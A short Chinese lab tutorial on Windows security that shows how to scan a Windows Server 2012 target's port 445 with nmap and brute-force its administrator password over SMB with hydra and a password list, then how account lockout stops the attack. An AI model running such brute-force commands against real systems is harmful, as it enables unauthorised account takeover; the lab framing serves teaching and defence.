十八、windows系统安全---利用Hydra获得账号密码

环境

靶机:windows server 2012

攻击机:kali linux

靶机环境

  • 密码为弱口令
  • 设定登录失败的次数 锁定用户账号,关闭密码复杂度

十八、windows系统安全---利用Hydra获得账号密码_第1张图片

十八、windows系统安全---利用Hydra获得账号密码_第2张图片

步骤

1.在kali上探测目标主机(可在目标主机通过ipconfig查看目标主机IP)是否开启445端口

nmap 192.168.99.105 -p 445

十八、windows系统安全---利用Hydra获得账号密码_第3张图片

2.使用hydra对已知的administrator账号进行爆破(注意pass.txt的路径)

hydra -l administrator -P pass.txt smb://192.168.99.105

十八、windows系统安全---利用Hydra获得账号密码_第4张图片

3.暴力破解防御措施 – 设定登录失败的次数 锁定用户账号

十八、windows系统安全---利用Hydra获得账号密码_第5张图片

继续爆破,账号被锁定不能登录

十八、windows系统安全---利用Hydra获得账号密码_第6张图片

你可能感兴趣的:(Windows,系统安全,安全,windows)